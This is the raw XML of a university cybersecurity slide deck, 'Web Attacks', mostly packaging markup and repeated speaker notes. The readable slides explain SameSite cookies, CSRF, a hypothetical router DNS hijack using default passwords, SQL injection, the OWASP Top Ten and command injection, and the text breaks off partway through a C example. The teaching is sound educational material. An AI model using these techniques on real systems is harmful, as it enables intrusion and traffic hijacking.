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media/image1.jpeg" ContentType="image/jpe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media/image2.jpeg" ContentType="image/jpe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media/image3.jpeg" ContentType="image/jpeg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media/image4.jpeg" ContentType="image/jpeg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  <p:sldId id="287" r:id="rId39"/>
    <p:sldId id="288" r:id="rId40"/>
    <p:sldId id="289" r:id="rId41"/>
    <p:sldId id="290" r:id="rId42"/>
    <p:sldId id="291" r:id="rId43"/>
    <p:sldId id="292" r:id="rId44"/>
    <p:sldId id="293" r:id="rId45"/>
    <p:sldId id="294" r:id="rId46"/>
    <p:sldId id="295" r:id="rId47"/>
    <p:sldId id="296" r:id="rId48"/>
    <p:sldId id="297" r:id="rId49"/>
    <p:sldId id="298" r:id="rId50"/>
    <p:sldId id="299" r:id="rId51"/>
    <p:sldId id="300" r:id="rId5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0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Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide29.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide30.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide31.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide32.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide33.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide34.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide35.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide36.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide37.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide38.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide39.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide40.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide41.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide42.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide43.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide44.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide45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</Relationships>
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7.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>
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8.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>
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9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide13.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide20.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide14.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide21.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide15.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide22.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide16.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide23.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide17.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide24.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide18.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide25.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide19.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide26.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>
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</Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide20.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide27.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide21.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide28.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide22.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide29.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide23.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide31.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide24.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide32.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide25.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide33.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide26.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide34.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide27.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide35.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide28.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide36.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide29.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide37.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>
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</Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide30.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide38.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide31.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide39.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide32.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide40.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide33.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide41.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide34.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide42.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide35.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide43.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide36.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide44.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide37.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide45.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>
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</Relationships>
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</Relationships>
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</Relationships>
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</Relationships>
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14.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>
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16.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/>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6" name="Shape 146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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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51" name="Shape 251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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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Shape 256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57" name="Shape 257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pPr/>
            <a:r>
              <a:t>Imagine we have a login form on a website that we want to check against a backend SQL database.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Shape 261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62" name="Shape 262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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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Shape 266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67" name="Shape 267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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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Shape 271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72" name="Shape 272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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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Shape 276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77" name="Shape 277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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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Shape 281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82" name="Shape 282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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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Shape 286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87" name="Shape 287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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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Shape 291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92" name="Shape 292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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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Shape 296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97" name="Shape 297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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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90" name="Shape 190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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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Shape 301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02" name="Shape 302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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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Shape 309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10" name="Shape 310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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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Shape 314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15" name="Shape 315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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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Shape 323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24" name="Shape 324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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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Shape 329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30" name="Shape 330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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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Shape 337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38" name="Shape 338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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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Shape 345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46" name="Shape 346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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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Shape 351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52" name="Shape 352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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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Shape 356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57" name="Shape 357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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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Shape 362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63" name="Shape 363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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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95" name="Shape 195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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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Shape 368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69" name="Shape 369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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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Shape 373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74" name="Shape 374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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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79" name="Shape 379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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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Shape 383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84" name="Shape 384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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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Shape 389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90" name="Shape 390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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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Shape 394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95" name="Shape 395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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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Shape 399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400" name="Shape 400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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.</a:t>
            </a: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Shape 404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405" name="Shape 405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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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Shape 199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00" name="Shape 200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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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17" name="Shape 217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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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22" name="Shape 222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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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Shape 227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28" name="Shape 228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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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38" name="Shape 238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pPr/>
            <a:r>
              <a:t>Big shift today! Next four lectures are going to be about the web.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Shape 245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46" name="Shape 246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pPr/>
            <a:r>
              <a:t>However, nothing enforces that you only pass in command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr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/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21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3200"/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“Type a quote here.”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22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21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21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1778000" y="4533900"/>
            <a:ext cx="20828000" cy="46482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idx="21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half" idx="21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21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22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idx="23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b="0" sz="24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5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5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5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5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5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5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5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5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b="0" baseline="0" cap="none" i="0" spc="0" strike="noStrike" sz="52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jpeg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png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8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9.xml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0.xml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jpeg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2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3.xml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4.xml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5.xml"/></Relationships>
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6.xml"/></Relationships>
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7.xml"/></Relationships>
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8.xml"/></Relationships>
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9.xml"/></Relationships>
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0.xml"/></Relationships>
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1.xml"/></Relationships>
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2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tif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/></Relationships>
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3.xml"/></Relationships>
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4.xml"/></Relationships>
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5.xml"/></Relationships>
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6.xml"/></Relationships>
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7.xml"/></Relationships>
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8.xml"/></Relationships>
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4.png"/></Relationships>
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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jpeg"/></Relationships>
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1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tif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide4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2.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide4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3.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide4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4.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide4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5.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide4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6.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide4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7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Web Attacks"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1778000" y="1549400"/>
            <a:ext cx="20828000" cy="4648200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="12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/>
            <a:r>
              <a:t>Web Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Comp4634 Cybersecurity"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="subTitle" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1778000" y="6337300"/>
            <a:ext cx="20828000" cy="1587500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="6000">
                <a:solidFill>
                  <a:srgbClr val="5E5E5E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/>
            <a:r>
              <a:t>Comp4634 Cybersecurity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sameSite Cookie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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>sameSite Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Cookie option that prevents browser from sending a cookie along with cross-site requests.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="7654454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Cookie option that prevents browser from sending a cookie along with cross-site requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1"/>
            </a:pPr>
            <a:r>
              <a:t>Strict Mode. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0"/>
              <a:t>Never send cookie in any cross-site browsing context, even when following a regular link. If a logged-in user follows a link to a private GitHub project from email, GitHub will not receive the session cookie and the user will not be able to access the project.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1"/>
            </a:pPr>
            <a:r>
              <a:t>Lax Mode. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0"/>
              <a:t> Session cookie is be allowed when following a regular link from but blocks it in CSRF-prone request methods (e.g. POST).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Beyond Authenticated Session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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Beyond Authenticated Sessions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Prior attacks were using CRSF attack to abuse cookies from logged-in user  Not all attacks are attempting to abuse authenticated user…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="6168356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Prior attacks were using CRSF attack to abuse cookies from logged-in user </a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>Not all attacks are attempting to abuse authenticated user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>Imagine script that logs into your local router using default password and changes DNS settings to hijack traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="635000">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>→ Logging in to a site is a request with a side effect! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="226" name="71k02T6KxML._AC_SX679_.jpg" descr="71k02T6KxML._AC_SX679_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7596125" y="9172051"/>
            <a:ext cx="5473525" cy="362752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chemeClr val="accent3">
            <a:hueOff val="914337"/>
            <a:satOff val="31515"/>
            <a:lumOff val="-30790"/>
          </a:scheme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SQL Injection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17000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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/>
            <a:r>
              <a:t>SQL Injection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OWASP Ten Most Critical Web Security Risk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594360">
              <a:defRPr sz="936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/>
            <a:r>
              <a:t>OWASP Ten Most Critical Web Security Risks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="233" name="Screen Shot 2019-04-24 at 8.26.53 PM.png" descr="Screen Shot 2019-04-24 at 8.26.53 PM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296171" y="3035100"/>
            <a:ext cx="18086480" cy="974861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Command Injection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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="The goal of command injection attacks is to execute an arbitrary command on the system. Typically possible when a developer passes unsafe user data into a shell.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="8324316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sz="4300"/>
            </a:pPr>
            <a:r>
              <a:t>The goal of command injection attacks is to execute an arbitrary command on the system. Typically possible when a developer passes unsafe user data into a shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4300"/>
            </a:pPr>
            <a:r>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>head100</a:t>
            </a:r>
            <a:r>
              <a:t> — simple program that cats first 100 lines of a program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C01E51"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0433FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C01E51"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:t> argc, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C01E51"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
